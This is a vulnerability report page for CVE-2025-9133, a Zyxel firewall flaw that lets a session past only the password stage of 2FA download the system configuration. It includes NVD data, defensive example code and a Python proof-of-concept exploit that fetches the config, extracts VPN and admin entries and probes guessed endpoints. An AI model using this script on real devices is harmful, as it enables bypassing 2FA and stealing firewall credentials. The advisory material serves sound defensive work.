Security Vulnerability Report
CVE-2025-9133 CVSS 8.1 HIGH

CVE-2025-9133

Published: 2025-10-21 03:15:37
Last Modified: 2025-10-28 19:18:15

Description

A missing authorization vulnerability in Zyxel ATP series firmware versions from V4.32 through V5.40, USG FLEX series firmware versions from V4.50 through V5.40, USG FLEX 50(W) series firmware versions from V4.16 through V5.40, and USG20(W)-VPN series firmware versions from V4.16 through V5.40 could allow a semi-authenticated attacker—who has completed only the first stage of the two-factor authentication (2FA) process—to view and download the system configuration from an affected device.
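The flaw class above (CWE-862, missing authorization) is easy to reproduce in any two-stage login: the password stage hands out a session that is "logged in" in some loose sense, and a privileged handler only checks for that loose state instead of for completion of the second factor. The following is an added example written for this page, not Zyxel code; the user records, OTP value, config string and handler names are constructed placeholders. It shows the vulnerable gate and the hardened gate side by side so the difference is the single state check.

```python
"""Vulnerable vs. hardened authorization gate for a password + OTP login.
Constructed example; users, OTP, config text and endpoint names are placeholders."""
from enum import Enum, auto
import hmac


class AuthState(Enum):
    ANONYMOUS = auto()          # no credentials presented yet
    PASSWORD_VERIFIED = auto()  # first factor passed, OTP still pending
    AUTHENTICATED = auto()      # both factors passed


class Session:
    def __init__(self):
        self.state = AuthState.ANONYMOUS
        self.user = None


# Constructed user store: plaintext for brevity only; a real device stores hashes.
USERS = {"admin": {"password": "correct horse", "otp": "123456"}}

# Constructed stand-in for the device's startup-config (contains secrets in real life).
CONFIG = "hostname fw01\nvpn ike policy corp psk REDACTED\nusername admin password REDACTED"


def login_password(session, user, password):
    """Stage 1: verify the password and move the session to PASSWORD_VERIFIED."""
    rec = USERS.get(user)
    if rec is None or not hmac.compare_digest(rec["password"], password):
        return False
    session.user = user
    session.state = AuthState.PASSWORD_VERIFIED
    return True


def login_otp(session, otp):
    """Stage 2: verify the second factor; only then is the session fully authenticated."""
    if session.state is not AuthState.PASSWORD_VERIFIED:
        return False
    if not hmac.compare_digest(USERS[session.user]["otp"], otp):
        return False
    session.state = AuthState.AUTHENTICATED
    return True


def export_config_vulnerable(session):
    """CWE-862 pattern: the handler only checks that *some* login step happened.
    A session that passed the password stage but never the OTP stage gets the config."""
    if session.state is AuthState.ANONYMOUS:
        raise PermissionError("login required")
    return CONFIG


def export_config_fixed(session):
    """Hardened gate: require the terminal AUTHENTICATED state explicitly.
    Any new intermediate state added later is denied by default."""
    if session.state is not AuthState.AUTHENTICATED:
        raise PermissionError("complete two-factor authentication first")
    return CONFIG


def demo():
    """Walk a semi-authenticated session through both handlers.
    Returns (vulnerable_leaked, fixed_blocked, fixed_allowed_after_otp)."""
    s = Session()
    login_password(s, "admin", "correct horse")
    leaked = export_config_vulnerable(s) == CONFIG
    try:
        export_config_fixed(s)
        fixed_blocked = False
    except PermissionError:
        fixed_blocked = True
    login_otp(s, "123456")
    allowed_after = export_config_fixed(s) == CONFIG
    return leaked, fixed_blocked, allowed_after


if __name__ == "__main__":
    print(demo())
```

The safer design goes one step further than the fixed handler: the password stage should issue only a short-lived "pending second factor" token that is accepted by the OTP endpoint and nothing else, and the real session cookie is minted only when the OTP succeeds. Then no privileged handler can ever observe a half-authenticated session, and the audit check reduces to "does every handler demand the real session".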

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

NVD models each product series as an AND of the ZLD firmware version range (the vulnerable component) and the hardware platforms it runs on. The hardware CPEs carry "vulnerable: false" only because the flaw lives in the firmware, not because those models are safe: a listed model running firmware inside the range is affected. The version bounds below are taken from the raw NVD record at the end of this page (versionStartIncluding / versionEndExcluding), which ends the range exclusively at 5.41, i.e. every 5.40 build is treated as affected.

ATP series: ZLD firmware 4.32 ≤ version < 5.41 (V4.32 through V5.40)
cpe:2.3:o:zyxel:zld:*:*:*:*:*:*:*:* - VULNERABLE (4.32 ≤ version < 5.41)
cpe:2.3:h:zyxel:atp100:-:*:*:*:*:*:*:* - platform
cpe:2.3:h:zyxel:atp100w:-:*:*:*:*:*:*:* - platform
cpe:2.3:h:zyxel:atp200:-:*:*:*:*:*:*:* - platform
cpe:2.3:h:zyxel:atp500:-:*:*:*:*:*:*:* - platform
cpe:2.3:h:zyxel:atp700:-:*:*:*:*:*:*:* - platform
cpe:2.3:h:zyxel:atp800:-:*:*:*:*:*:*:* - platform

USG FLEX series: ZLD firmware 4.50 ≤ version < 5.41 (V4.50 through V5.40)
cpe:2.3:o:zyxel:zld:*:*:*:*:*:*:*:* - VULNERABLE (4.50 ≤ version < 5.41)
cpe:2.3:h:zyxel:usg_flex_100:-:*:*:*:*:*:*:* - platform
cpe:2.3:h:zyxel:usg_flex_100ax:-:*:*:*:*:*:*:* - platform
cpe:2.3:h:zyxel:usg_flex_100w:-:*:*:*:*:*:*:* - platform
cpe:2.3:h:zyxel:usg_flex_200:-:*:*:*:*:*:*:* - platform
cpe:2.3:h:zyxel:usg_flex_50:-:*:*:*:*:*:*:* - platform
cpe:2.3:h:zyxel:usg_flex_500:-:*:*:*:*:*:*:* - platform
cpe:2.3:h:zyxel:usg_flex_50ax:-:*:*:*:*:*:*:* - platform
cpe:2.3:h:zyxel:usg_flex_700:-:*:*:*:*:*:*:* - platform

USG FLEX 50(W) and USG20(W)-VPN series: ZLD firmware 4.16 ≤ version < 5.41 (V4.16 through V5.40)
cpe:2.3:o:zyxel:zld:*:*:*:*:*:*:*:* - VULNERABLE (4.16 ≤ version < 5.41)
cpe:2.3:h:zyxel:usg_20w-vpn:*:*:*:*:*:*:*:* - platform
cpe:2.3:h:zyxel:usg_flex_50w:-:*:*:*:*:*:*:* - platform

Summary of affected firmware ranges:
Zyxel ATP series firmware: V4.32 ≤ version ≤ V5.40
Zyxel USG FLEX series firmware: V4.50 ≤ version ≤ V5.40
Zyxel USG FLEX 50(W) series firmware: V4.16 ≤ version ≤ V5.40
Zyxel USG20(W)-VPN series firmware: V4.16 ≤ version ≤ V5.40
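For triage across a fleet, the per-series ranges above can be applied mechanically to an inventory export. The following is an added example, not a Zyxel or NVD tool: the ranges are copied from the NVD record on this page, the inventory rows are constructed, and the assumption that a version string looks like "V5.40" optionally followed by a parenthesised build tag (which the parser ignores) is mine, not something the advisory states. Because NVD's range ends exclusively at 5.41, any hotfix build still numbered 5.40 is flagged as affected here; confirm the exact fixed build against the vendor advisory before closing a finding.

```python
"""Affected-version check for CVE-2025-9133 built from the NVD configuration ranges.
Added example; the version-string format and the inventory rows are assumptions."""
import re

# (versionStartIncluding, versionEndExcluding) per product series, from the NVD JSON.
AFFECTED_RANGES = {
    "ATP": ("4.32", "5.41"),
    "USG FLEX": ("4.50", "5.41"),
    "USG FLEX 50(W)": ("4.16", "5.41"),
    "USG20(W)-VPN": ("4.16", "5.41"),
}

# Optional leading "V", then major.minor; anything after (e.g. "(ABPS.0)") is ignored.
# The build-tag handling is an assumption about the version format.
_VERSION_RE = re.compile(r"^V?(\d+)\.(\d+)")


def parse_version(text):
    """'V5.40', '5.40' or 'V5.40(ABPS.0)' -> (5, 40). Raises on anything else."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised firmware version: {text!r}")
    return int(m.group(1)), int(m.group(2))


def is_affected(series, version):
    """True when the firmware version falls inside the NVD range for that series."""
    start, end = AFFECTED_RANGES[series]
    return parse_version(start) <= parse_version(version) < parse_version(end)


def triage(inventory):
    """inventory: iterable of (hostname, series, version). Returns hostnames to patch."""
    return [host for host, series, version in inventory if is_affected(series, version)]


# Constructed sample inventory, not real devices.
SAMPLE_INVENTORY = [
    ("fw-hq", "ATP", "V5.40(ABPS.0)"),      # inside 4.32 <= v < 5.41
    ("fw-branch", "USG FLEX", "V4.32"),     # below the USG FLEX start of 4.50
    ("fw-lab", "USG FLEX 50(W)", "V5.41"),  # first build outside the range
    ("fw-soho", "USG20(W)-VPN", "4.16"),    # exactly at the inclusive start
]

if __name__ == "__main__":
    print(triage(SAMPLE_INVENTORY))
```

Note that the comparison is on (major, minor) integer tuples, so "5.40" sorts after "5.9"; this matches how ZLD release numbers are written on this page and in the NVD record, but would be wrong for a product that uses single-digit minor versions.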

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-9133 PoC - Zyxel Firewall Missing Authorization
# Exploits missing authorization after 2FA first stage authentication
# to download system configuration without completing second factor
import re

import requests
import urllib3

# The script talks to the device with verify=False; silence the resulting warnings.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

TARGET = "https://<target-zyxel-firewall>"
USERNAME = "admin"
PASSWORD = "password123"

session = requests.Session()

# Step 1: Perform first stage authentication (username + password)
print("[*] Attempting first stage 2FA authentication...")
login_url = f"{TARGET}/cgi-bin/authentication.cgi"
login_payload = {
    "username": USERNAME,
    "password": PASSWORD,
    "logintype": "0",  # Standard login
}
response = session.post(login_url, data=login_payload, verify=False)
print(f"[*] Login response status: {response.status_code}")

# Step 2: Extract partial session cookie/token after first stage
# The session is partially authenticated but 2FA second factor is pending
cookies = session.cookies.get_dict()
print(f"[*] Session cookies obtained: {cookies}")

# Step 3: Exploit missing authorization - access config download endpoint
# without completing the second factor of 2FA
print("[*] Attempting to download system configuration (bypassing 2FA second stage)...")
config_url = f"{TARGET}/cgi-bin/export-cgi?category=config&type=startup-config"
# The vulnerability: the endpoint does not verify 2FA completion
response = session.get(config_url, verify=False)

if response.status_code == 200:
    print("[+] SUCCESS: System configuration downloaded!")
    # Save the configuration file
    with open("zyxel_config_backup.conf", "wb") as f:
        f.write(response.content)
    print("[+] Configuration saved to zyxel_config_backup.conf")
    # Extract sensitive data from config
    config_content = response.text
    vpn_entries = re.findall(r"vpn\s+(\S+)", config_content)
    admin_users = re.findall(r"username\s+(\S+)", config_content)
    print(f"[*] Found VPN entries: {vpn_entries}")
    print(f"[*] Found admin accounts: {admin_users}")
else:
    print(f"[-] Failed with status code: {response.status_code}")

# Alternative endpoint variations
endpoints = [
    "/cgi-bin/export-cgi?category=config",
    "/cgi-bin/maintenance/configuration_backup.cgi",
    "/cgi-bin/backup.conf",
    "/cgi-bin/zysh-cgi",
]
for endpoint in endpoints:
    url = f"{TARGET}{endpoint}"
    resp = session.get(url, verify=False)
    if resp.status_code == 200 and len(resp.content) > 100:
        print(f"[+] Accessible endpoint found: {endpoint}")
        break

References

Vendor Advisory: https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-post-authentication-command-injection-and-missing-authorization-vulnerabilities-in-zld-firewalls-10-21-2025

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9133", "sourceIdentifier": "[email protected]", "published": "2025-10-21T03:15:36.563", "lastModified": "2025-10-28T19:18:15.210", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A missing authorization vulnerability in Zyxel ATP series firmware versions from V4.32 through V5.40, USG FLEX series firmware versions from V4.50 through V5.40, USG FLEX 50(W) series firmware versions from V4.16 through V5.40, and USG20(W)-VPN series firmware versions from V4.16 through V5.40 could allow a semi-authenticated attacker—who has completed only the first stage of the two-factor authentication (2FA) process—to view and download the system configuration from an affected device."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:zyxel:zld:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.32", "versionEndExcluding": "5.41", "matchCriteriaId": "6A48C1EF-AAAE-49F7-874E-A87745096960"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:atp100:-:*:*:*:*:*:*:*", "matchCriteriaId": "7F7654A1-3806-41C7-82D4-46B0CD7EE53B"}, {"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:atp100w:-:*:*:*:*:*:*:*", "matchCriteriaId": "47398FD0-6C5E-4625-9EFD-DE08C9AB7DB2"}, {"vulnerable": false, 
"criteria": "cpe:2.3:h:zyxel:atp200:-:*:*:*:*:*:*:*", "matchCriteriaId": "D68A36FF-8CAF-401C-9F18-94F3A2405CF4"}, {"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:atp500:-:*:*:*:*:*:*:*", "matchCriteriaId": "2818E8AC-FFEE-4DF9-BF3F-C75166C0E851"}, {"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:atp700:-:*:*:*:*:*:*:*", "matchCriteriaId": "0B41F437-855B-4490-8011-DF59887BE6D5"}, {"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:atp800:-:*:*:*:*:*:*:*", "matchCriteriaId": "66B99746-0589-46E6-9CBD-F38619AD97DC"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:zyxel:zld:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.50", "versionEndExcluding": "5.41", "matchCriteriaId": "D553EB25-CB12-4245-B522-3D4B75D5F221"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:usg_flex_100:-:*:*:*:*:*:*:*", "matchCriteriaId": "2B30A4C0-9928-46AD-9210-C25656FB43FB"}, {"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:usg_flex_100ax:-:*:*:*:*:*:*:*", "matchCriteriaId": "03036815-04AE-4E39-8310-DA19A32CFA48"}, {"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:usg_flex_100w:-:*:*:*:*:*:*:*", "matchCriteriaId": "D74ABA7E-AA78-4A13-A64E-C44021591B42"}, {"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:usg_flex_200:-:*:*:*:*:*:*:*", "matchCriteriaId": "F93B6A06-2951-46D2-A7E1-103D7318D612"}, {"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:usg_flex_50:-:*:*:*:*:*:*:*", "matchCriteriaId": "646C1F07-B553-47B0-953B-DC7DE7FD0F8B"}, {"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:usg_flex_500:-:*:*:*:*:*:*:*", "matchCriteriaId": "92C697A5-D1D3-4FF0-9C43-D27B18181958"}, {"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:usg_flex_50ax:-:*:*:*:*:*:*:*", "matchCriteriaId": "84936549-57C8-4F5C-9DA3-829A2290BB75"}, {"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:usg_flex_700:-:*:*:*:*:*:*:*", "matchCriteriaId": "9D1396E3-731B-4D05-A3F8-F3ABB80D5C29"}]}]}, 
{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:zyxel:zld:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.16", "versionEndExcluding": "5.41", "matchCriteriaId": "1822AD84-E658-48E7-A105-EEE6B3A2F914"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:usg_20w-vpn:*:*:*:*:*:*:*:*", "matchCriteriaId": "6D304892-0F94-484E-966F-326AFEDCE072"}, {"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:usg_flex_50w:-:*:*:*:*:*:*:*", "matchCriteriaId": "110A1CA4-0170-4834-8281-0A3E14FC5584"}]}]}], "references": [{"url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-post-authentication-command-injection-and-missing-authorization-vulnerabilities-in-zld-firewalls-10-21-2025", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}